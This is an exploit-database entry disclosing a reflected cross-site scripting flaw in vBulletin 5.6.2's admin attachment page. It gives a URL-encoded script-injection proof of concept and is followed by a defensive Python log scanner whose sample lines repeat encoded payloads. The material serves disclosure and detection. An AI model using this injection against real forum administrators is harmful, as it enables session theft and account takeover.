## https://sploitus.com/exploit?id=PACKETSTORM:158852
# Exploit Title: vBulletin 5.6.2 Cross Site Scripting  
# Date: 12.08.2020  
# Author: Vincent666 ibn Winnie  
# Software Link: https://www.vbulletin.com/en/features/  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# Blog : https://pentest-vincent.blogspot.com/  
# PoC: https://pentest-vincent.blogspot.com/2020/08/cross-site-scripting-in-vbulletin-ver.html  
  
So..  
  
We have a cross-site scripting vulnerability in vBulletin 5.6.2.  
  
PoC:  
  
I use the demo admin panel for the test.  
  
Our vulnerable link:  
  
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=[our xss is here]  
  
Full link with code:  
  
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(%22cross%20site%20scripting%20%22)%3C/script%3E  
  
Picture:  
  
https://imgur.com/a/OicFHyA
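
For defenders, the request shape above can be hunted for in web-server access logs. The following is an added example, not part of the original advisory: the function names and the log lines (combined log format, documentation-range IPs, benign `type` value) are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

TARGET = "/admincp/attachment.php"      # admin script named in the advisory
HTML_META = re.compile(r"[<>\"']")      # can close an attribute or open a tag
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines; only the first query string mirrors the advisory.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Aug/2020:10:00:01 +0000] "GET /admincp/attachment.php'
    '&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Aug/2020:10:00:05 +0000] "GET /admincp/attachment.php'
    '?do=rebuild&type=%253Cscript%253E HTTP/1.1" 200 512',      # double-encoded
    '198.51.100.4 - - [12/Aug/2020:10:01:00 +0000] "GET /admincp/attachment.php'
    '?do=rebuild&type=example HTTP/1.1" 200 512',               # benign value
    '198.51.100.4 - - [12/Aug/2020:10:02:00 +0000] "GET /search.php'
    '?type=%3Cb%3E HTTP/1.1" 200 512',                          # different script
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are inspected too."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def type_param(uri):
    """Return the raw `type` value of a request to TARGET, else None.

    The advisory's URL has `&` directly after `.php` (no `?`), so the query
    is split on both separators instead of relying on a URL parser.
    """
    pos = uri.lower().find(TARGET)
    if pos == -1:
        return None
    for pair in re.split(r"[?&]", uri[pos + len(TARGET):]):
        name, _, value = pair.partition("=")
        if decode_fully(name).lower() == "type":
            return value
    return None

def suspicious(log_line):
    """True when the `type` parameter carries HTML metacharacters."""
    match = REQUEST.search(log_line)
    if not match:
        return False
    raw = type_param(match.group(1))
    return raw is not None and bool(HTML_META.search(decode_fully(raw)))
```

Running `[suspicious(line) for line in SAMPLE_LOG]` flags the first two lines only; hits against a real admin panel are worth correlating with the admin session that issued them.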